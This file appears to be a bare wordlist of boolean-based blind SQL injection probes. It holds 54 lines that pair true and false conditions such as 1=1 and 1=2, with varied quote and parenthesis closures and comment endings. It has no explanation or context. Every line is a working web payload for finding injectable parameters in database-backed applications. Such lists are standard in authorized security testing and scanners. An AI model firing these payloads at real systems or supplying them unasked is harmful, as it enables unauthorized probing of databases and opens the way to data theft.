 and 1=2 -- 1
 and 1=1 -- 1
) and 1=2 -- 1
) and 1=1 -- 1
)) and 1=2 -- 1
)) and 1=1 -- 1
' and 1=2 -- 1
' and 1=1 -- 1
') and 1=2 -- 1
') and 1=1 -- 1
')) and 1=2 -- 1
')) and 1=1 -- 1
' and 'a'='b' -- 1
' and 'a'='a' -- 1
') and 'a'='b' -- 1
') and 'a'='a' -- 1
')) and 'a'='b' -- 1
')) and 'a'='a' -- 1
 and 1=2 #
 and 1=1 #
) and 1=2 #
) and 1=1 #
)) and 1=2 #
)) and 1=1 #
' and 1=2 #
' and 1=1 #
') and 1=2 #
') and 1=1 #
')) and 1=2 #
')) and 1=1 #
' and 'a'='b' #
' and 'a'='a' #
') and 'a'='b' #
') and 'a'='a' #
')) and 'a'='b' #
')) and 'a'='a' #
 and 1=2
 and 1=1
) and 1=2
) and 1=1
)) and 1=2
)) and 1=1
' and 1=2 and '
' and 1=1 and '
') and 1=2 and ('
') and 1=1 and ('
')) and 1=2 and (('
')) and 1=1 and (('
' and 'a'='b' '
' and 'a'='a' '
') and 'a'='b' and ('
') and 'a'='a' and ('
')) and 'a'='b' and (('
')) and 'a'='a' and (('